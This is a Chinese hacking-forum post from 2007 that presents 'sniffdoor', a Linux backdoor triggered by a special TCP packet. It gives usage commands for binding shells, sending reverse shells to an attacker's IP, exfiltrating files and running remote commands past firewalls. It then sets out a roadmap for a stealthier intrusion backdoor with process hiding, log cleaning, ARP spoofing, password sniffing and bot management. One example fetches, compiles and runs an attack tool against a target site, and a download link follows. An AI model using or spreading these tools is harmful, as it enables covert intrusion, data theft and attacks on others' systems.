Linux sniffdoor v 1.0
软件作者:wzt <[email protected]>
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
注意:文章首发www.XSec.org,后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。
SniffDoor V 1.0 (c) 2007 by wzt <[email protected]>
+————————————————–+
Sniffdoor is a linux backdoor woke up with a special
tcp packet.It can bind a shell with tty,it can send
files with tcp packet,that's means the server side
can sniff your files in the special tcp packets,
and save on its server.The client can send a shell
command with the packet,the server sniff and execute
it,so it can round the firewall.
+————————————————–+
[USAGE]:
server:
$make;
./sniffdoor
client:
$make;
./sniffclient
sniffdoor <options> [remote_ip] [port] [command]
<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>
<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>
1. bindshell:
send tcp packet to host 61.155.217.56,and then it
bind a shell on port 999
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
port 22 is a active port on the host.
2.connect back door:
1).you server must listen a port first(your ip
is 123.45.64.57):
./client -listen 999
2).send tcp packet to host 61.155.217.56,and then
bind a shell to remote 123.45.64.57 on port 999
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999
3.send file:
1).send file with tcp packet.
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c
NOTE!
It can only send txt files , not binary files.
If you fixed up this bug,mail to me,thx.
4.execute command:
1).execute command with tcp packet.
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"
+—————————————————–+
[THANKS]:
Thank baozi for testing the door all the time.
[END]:
send any bug to <[email protected]>.
-wzt
ps:最近在一个linux下的allinone,大家有什么好想法可以在此讨论下.
做一个allinone的渗透型后门,有了这个后门,我们就可以在linux里渗透其他的linux/windows,争取做到一sniffdoor在手,别无他求。
我有如下功能建议,大家多多提出自己的想法,包括大的功能上的和某个功能的某个细节上的,争取弄一个完美的linux渗透型后门。
1: htran with udp support 把windows下的htran移植进来,包括socks5(带用户密码) –>有点难度,比如client 发送 ip pack -proxy -bind eth0 port user pass –>接近完工
2:灵活的回连设置。
3:自动启动 ELF插入启动,注意宿主程序工作是否正常,感染程序名称等等问题。
4:通讯加密
5:portscanner with banner grabber
6:logcleaner –>难度很小,有点必要,呵呵,因为有其他的wipe了,当然,有就最好了
7:arp欺骗+网络sniffer弄进来,可以抓一些明文的密码,如果可以抓smb就超级强了 –>难度一般,比较必要,我觉得可以先把本机sniffer做出来,arp的以后再慢慢加
8:隐藏,隐藏,现在初步打算用fake proc name来忽悠一下,弄成-bash,呵呵,之后做个lkm来隐藏下,最好可以做到动态隐藏。
9:ttysniffer弄进来 –>难度十分之大,但十分必要
10:把client和server整合在一起,精简参数,打包的时候附带cygwin版本,以便在windows里使用。最好可以带上肉鸡管理功能,方便以后批量发送指令,例如wget ip/juno.c;gcc juno.c -o juno ; ./juno www.xxx.com 80 :)
11:httpd……………多线程………………………auth,port,directory,index,4个参数,呵呵。
./sniffclient -packet ip bind:9999
就会绑定9999端口
./sniffclient -packet ip back:11.22.33.44:9999
就把shell反弹到11.22.33.44的9999端口上
sniffcilent,sniffserver都需要root权限
下载地址(直接到邪八那里下吧):sniffdoor.tgz
支持。